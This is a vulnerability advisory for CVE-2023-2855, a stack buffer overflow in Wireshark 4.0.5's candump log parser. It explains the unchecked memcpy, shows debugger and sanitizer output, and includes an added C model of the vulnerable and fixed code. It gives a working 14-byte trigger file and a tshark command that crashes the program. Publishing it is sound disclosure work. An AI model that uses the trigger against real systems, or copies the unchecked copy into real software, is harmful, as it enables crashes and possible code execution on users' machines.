Stack-buffer-overflow in candump_write_packet

May 26, 2023

CVE Number

CVE-2023-2855

Credits

Huascar Tejeda of Pentraze Cybersecurity

Summary

A stack-buffer-overflow vulnerability has been identified in the candump_write_packet function of Wireshark 4.0.5. It is triggered when a specially crafted candump log file is opened, and results in a crash and potentially code execution.

CVSS

9.0 (Critical) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Details

The issue can be traced back to the candump_write_packet function in the wiretap/candump.c file. The AddressSanitizer report shows a WRITE of size 9 at address 0x7fffffffdb88, overflowing can_frame.sroa.660, the compiler-split (SROA) stack copy of the local can_frame variable.

The root cause is the memcpy call in candump_write_packet at line 83 of wiretap/candump.c. Its length argument, msg->data.length, comes straight from the parsed file and is never checked against the fixed 8-byte destination buffer, so an oversized value overflows it:

#define CAN_MAX_DLEN   8

typedef struct can_frame {
    guint32 can_id;                       /* 32 bit CAN_ID + EFF/RTR/ERR flags */
    guint8  can_dlc;                      /* frame payload length in byte (0 .. CAN_MAX_DLEN) */
    guint8  __pad;                        /* padding */
    guint8  __res0;                       /* reserved / padding */
    guint8  __res1;                       /* reserved / padding */
    guint8  data[CAN_MAX_DLEN];
} can_frame_t;

memcpy(can_frame.data, msg->data.data, msg->data.length);


Breaking on the memcpy call at candump_write_packet+612 shows its arguments ($rdi the destination can_frame.data, $rsi the source msg->data.data, $rdx the length):

   $rdi = 0x00007fffffffdd78 → 0x0000000000000000,
   $rsi = 0x00007fffffffde12 → 0x0000000000000000,
 → $rdx = 0x0000000000000009
 →   0x42ba84 <candump_write_packet+612> call   0x406f30 <memcpy@plt>

The can_frame structure stores a classic CAN (Controller Area Network) frame: the CAN ID, the data length code (DLC) and up to CAN_MAX_DLEN (8) bytes of payload. In the trigger file, msg->data.length is 9, the DLC digit following R in the remote frame 000#R9, which is larger than the 8-byte destination buffer can_frame.data. memcpy therefore writes 9 bytes into a buffer that can only hold 8, and the ninth byte lands past the end of the structure on the stack.
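The following program is an added example written for this page, not Wireshark's code. It models the path just described: a minimal parser for the ID#DATA / ID#R<dlc> token of a candump log line hands the packet writer a length taken from the file, the unchecked writer copies that many bytes into the fixed 8-byte can_frame.data, and a hardened writer rejects any DLC above CAN_MAX_DLEN before the copy. The struct mirrors the one quoted above and CAN_RTR_FLAG is the SocketCAN value; the function names, the candump_msg_t type and its 64-byte staging buffer are assumptions for illustration, and both input lines are constructed (the first is the trigger from the reproduction steps below).

```c
/*
 * Added example for this advisory (not Wireshark code). It models the
 * candump log path behind CVE-2023-2855: the parser hands the packet writer a
 * length read from the file, and the writer copies that many bytes into a
 * fixed 8-byte can_frame.data. The struct mirrors the one quoted in the
 * advisory; candump_msg_t and all function names are assumptions.
 */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CAN_MAX_DLEN  8
#define CAN_RTR_FLAG  0x40000000U   /* SocketCAN remote-transmission-request bit */

typedef struct can_frame {
    uint32_t can_id;
    uint8_t  can_dlc;
    uint8_t  __pad;
    uint8_t  __res0;
    uint8_t  __res1;
    uint8_t  data[CAN_MAX_DLEN];
} can_frame_t;

/* What the log-line parser hands to the packet writer (assumed layout). */
typedef struct {
    uint32_t id;
    int      is_rtr;
    size_t   length;        /* attacker-controlled: read from the file */
    uint8_t  data[64];      /* staging buffer, deliberately larger than a classic frame */
} candump_msg_t;

/*
 * Parse the "ID#DATA" or "ID#R<dlc>" token of a candump log line such as
 * "(0.0) vcan0 123#DEADBEEF". Returns 0 on success, -1 if malformed.
 * The DLC is NOT validated here, matching the behaviour the advisory
 * describes: the parser accepts "000#R9" and reports length 9.
 */
static int candump_parse_line(const char *line, candump_msg_t *msg)
{
    const char *hash = strchr(line, '#');
    if (hash == NULL)
        return -1;

    /* The CAN ID is the run of hex digits immediately before '#'. */
    const char *id_start = hash;
    while (id_start > line && isxdigit((unsigned char)id_start[-1]))
        id_start--;
    if (id_start == hash)
        return -1;

    memset(msg, 0, sizeof *msg);
    msg->id = (uint32_t)strtoul(id_start, NULL, 16);   /* stops at '#' */

    const char *payload = hash + 1;
    if (*payload == 'R') {
        /* Remote frame: an optional single digit after 'R' is the DLC. */
        msg->is_rtr = 1;
        if (isdigit((unsigned char)payload[1]))
            msg->length = (size_t)(payload[1] - '0');
        return 0;
    }

    /* Data frame: consecutive hex byte pairs up to end of line. */
    size_t n = 0;
    while (isxdigit((unsigned char)payload[0]) && isxdigit((unsigned char)payload[1])) {
        if (n >= sizeof msg->data)
            return -1;
        char pair[3] = { payload[0], payload[1], '\0' };
        msg->data[n++] = (uint8_t)strtoul(pair, NULL, 16);
        payload += 2;
    }
    msg->length = n;
    return 0;
}

/* The vulnerable shape: the file-supplied length goes straight into memcpy. */
static void write_packet_unchecked(const candump_msg_t *msg, can_frame_t *frame)
{
    frame->can_id  = msg->id | (msg->is_rtr ? CAN_RTR_FLAG : 0);
    frame->can_dlc = (uint8_t)msg->length;
    memcpy(frame->data, msg->data, msg->length);   /* 9 bytes into 8: stack overflow */
}

/* Hardened: refuse any DLC a classic CAN frame cannot hold before copying. */
static int write_packet_checked(const candump_msg_t *msg, can_frame_t *frame)
{
    if (msg->length > CAN_MAX_DLEN)
        return -1;                                  /* "000#R9" is rejected here */
    memset(frame, 0, sizeof *frame);
    frame->can_id  = msg->id | (msg->is_rtr ? CAN_RTR_FLAG : 0);
    frame->can_dlc = (uint8_t)msg->length;
    memcpy(frame->data, msg->data, msg->length);
    return 0;
}

int main(void)
{
    /* Constructed input: the advisory's 14-byte trigger, then a benign data frame. */
    const char *lines[] = { "(0.0)\t0\t000#R9", "(0.0) vcan0 123#DEADBEEF" };

    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        candump_msg_t msg;
        can_frame_t frame;

        if (candump_parse_line(lines[i], &msg) != 0) {
            printf("parse error: %s\n", lines[i]);
            continue;
        }
        if (write_packet_checked(&msg, &frame) != 0) {
            printf("rejected: DLC %zu exceeds CAN_MAX_DLEN (%d)\n", msg.length, CAN_MAX_DLEN);
            continue;   /* the unchecked writer would overflow here; never run it on this input */
        }
        write_packet_unchecked(&msg, &frame);       /* safe only because the check above passed */
        printf("ok: id=0x%03x dlc=%u\n", frame.can_id & 0x1fffffffU, frame.can_dlc);
    }
    return 0;
}
```

The check sits in the consumer rather than the lexer on purpose: the candump grammar legitimately carries longer payloads for CAN FD frames, so the classic-frame writer is the place that knows its destination is 8 bytes. Compiling with -fsanitize=address and calling write_packet_unchecked on the first line reproduces the WRITE of size 9 reported above.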

Steps to reproduce:

  1. Download and install Wireshark 4.0.5
  2. Create the 14-byte trigger file shown below: a one-line candump log consisting of the timestamp "(0.0)", a tab, the interface "0", a tab, and the remote frame "000#R9", whose DLC digit 9 exceeds CAN_MAX_DLEN
  3. Run tshark -r trigger

$ xxd -g1 trigger
00000000: 28 30 2e 30 29 09 30 09 30 30 30 23 52 39        (0.0).0.000#R9

$ tshark -r trigger
*** buffer overflow detected ***: terminated
Aborted

The "buffer overflow detected" message comes from glibc's _FORTIFY_SOURCE check on memcpy; on a build without that check (and without ASAN) the out-of-bounds write is silent.

After recompiling with CANDUMP_DEBUG defined, the debug output shows the file being accepted by the candump detector and the single message being read before the abort:
$ tshark -r trigger
candump_parse: Trying candump file decoder
candump_parse: Starting parser at offset 0
run_candump_parser: Starting parsing
yy_reduce: read message
run_candump_parser: Done (0)
candump_parse: Success
candump_open: This is our file
candump_read: Try reading at offset 0
candump_parse: Trying candump file decoder
candump_parse: Starting parser at offset 0
run_candump_parser: Starting parsing
yy_reduce: read message
run_candump_parser: Done (0)
candump_parse: Success
candump_read: Stopped at offset 14
*** buffer overflow detected ***: terminated
Aborted
